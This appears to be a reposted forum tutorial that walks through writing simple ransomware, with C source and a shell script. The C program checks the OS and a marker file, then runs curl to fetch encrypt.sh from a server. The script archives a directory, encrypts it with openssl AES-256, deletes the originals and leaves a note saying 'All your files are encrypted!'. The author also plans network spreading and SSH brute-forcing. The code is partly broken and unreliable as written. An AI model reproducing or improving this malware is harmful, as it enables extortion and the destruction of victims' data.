ransomware tutorial

ransomware tutorial

geekcode

Ransomware is a form of malware from cryptovirology that threatens to permanently block access to victims' personal data without publishing it or paying a ransom.

Although some simple ransomware can lock the system without damaging any file, the most advanced malware uses a technique called crypto viral extraction.



This version is very basic. The next one will be able to spread throughout a network, and also use a dictionary attack or brute-force ssh logins. More experienced malware coders please take a look and critique the code, I’d appreciate it.


The first part of the malware includes a few essential libraries. Next, it checks to see if the OS is macOS, Linux, or Windows. If it’s windows the program should fail immediately. The next version of this program will work on windows.


CODE: SELECT ALL

#include <stdlib.h>

#include <string.h>

#include <sys/stat.h>



 /*checks OS, fails if windows*/

void os_check(){

  #ifdef _WIN32

    exit(1)

  

  #elif __APPLE__

      printf();

  

  #elif __LINUX__

    printf();

#endif


}



This next section checks to see if the host has already been infected. If so it fails automatically. Of course this to make sure the program doesn’t try infect a system it’s already compromised. Next, we create a pointer called *command. Then memory is allocated for it. Afterwards we pass a string to strcpy, which passes this to command. The command is then run by the system call, system(). If there’s a better way to do this please let me know. The commands are to download a shell script which encrypts the user’s file or directory using aes256.


There’s several other features I wanted to add however I need to read up on implementing them.


CODE: SELECT ALL

int infected(const char *filename){

  filename = "/tmp/worm.c";

  struct stat buffer;

  int exist = stat(filename,&buffer);

  if(exist == 0)

    exit(1);

  else

    return 0;


}


int main(void){

  

  char *command = malloc(60 * sizeof(char));


  strcpy(command, "cd /tmp && curl http://0.0.0.0:8000/encrypt.sh");

  system(command);

  strcpy(command, "./encrypt.sh");

}



Shell script


CODE: SELECT ALL

#compresses file using tar, encrypts with openssl using aes256 encryption

if [ $1!=$1 ]

then

  cd /tmp/test #use whatever directory

  tar -czvf test.tar.gz test

  openssl aes256 -salt -in test.tar.gz -out test.aes256 -d -pass pass:#password

  rm test.tar.gz

  rm -r test

  echo "All your files are encrypted!" > note.txt

fi



Hope You guys liked this tutorial.

Saying this again that its not my tutorial or method.

I got this from one of my resources and shared with you guyz.

And as you guys know that.


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org